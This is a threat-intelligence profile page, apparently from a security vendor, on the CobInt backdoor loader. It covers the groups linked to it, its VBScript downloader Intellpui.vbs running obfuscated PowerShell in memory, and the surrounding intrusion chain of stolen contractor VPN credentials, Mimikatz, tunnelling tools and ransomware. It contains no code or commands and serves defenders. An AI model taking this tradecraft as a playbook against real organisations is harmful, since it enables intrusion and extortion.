CobInt
CobInt is a backdoor/loader observed in campaigns targeting Russian organizations and associated in the provided reporting with ExCobalt (also referenced in overlap analysis as Shedding Zmiy/ExCobalt) and with the threat actor Crypt Ghouls. Kaspersky described CobInt as a “telltale tool” and identified it as a backdoor used by ExCobalt. In observed Crypt Ghouls intrusions, CobInt was used as a backdoor loader. The specific CobInt downloader described in the content was a VBScript named Intellpui.vbs that executed obfuscated PowerShell code, enabling malware to be loaded directly into memory without leaving traces on disk. The surrounding intrusion activity included abuse of compromised contractor and subcontractor credentials for VPN access, followed by use of tools such as NSSM and Localtonet for persistence and remote access, credential theft with Mimikatz and XenAllPasswordPro, and deployment of LockBit 3.0 on Windows and Babuk on Linux/ESXi. Related ExCobalt activity in the same reporting included attempts to steal Telegram credentials and message history and Outlook Web Access credentials. Victim organizations mentioned in connection with these campaigns included Russian businesses, government agencies, and entities in sectors such as mining, energy, finance, and retail. The only explicit CobInt-related filename/IOC in the content is Intellpui.vbs.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
"...their use of CobInt, a backdoor loader... The CobInt downloader we encountered is a VBScript called Intellpui.vbs that executes obfuscated PowerShell code..."
...attempts to siphon Telegram credentials... and Outlook Web Access credentials... - CobInt, a known backdoor used by the group.
Techniques & procedures
4 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniques...threat actors leveraging a contractor's login credentials to connect to the internal systems via VPN... weaponizing trusted relationships.
"...Outlook Web Access credentials by injecting malicious code into the login page..."
"...shifting the focus... from the exploitation of 1-day vulnerabilities in corporate services available from the internet (e.g., Microsoft Exchange)..."
Persistence
1 techniquePrivilege Escalation
1 techniqueStealth
1 techniqueCredential Access
1 techniqueCollection
1 techniqueRecent activity
3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Backdoor used by ExCobalt; associated activity includes credential theft from Telegram and Outlook Web Access via malicious code injection into the login page.
Backdoor/loader used to execute obfuscated PowerShell and load additional malware into memory (fileless/in-memory execution), reducing on-disk artifacts.
Backdoor used post-compromise to facilitate follow-on exploitation/remote control as part of the intrusion chain preceding ransomware deployment.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.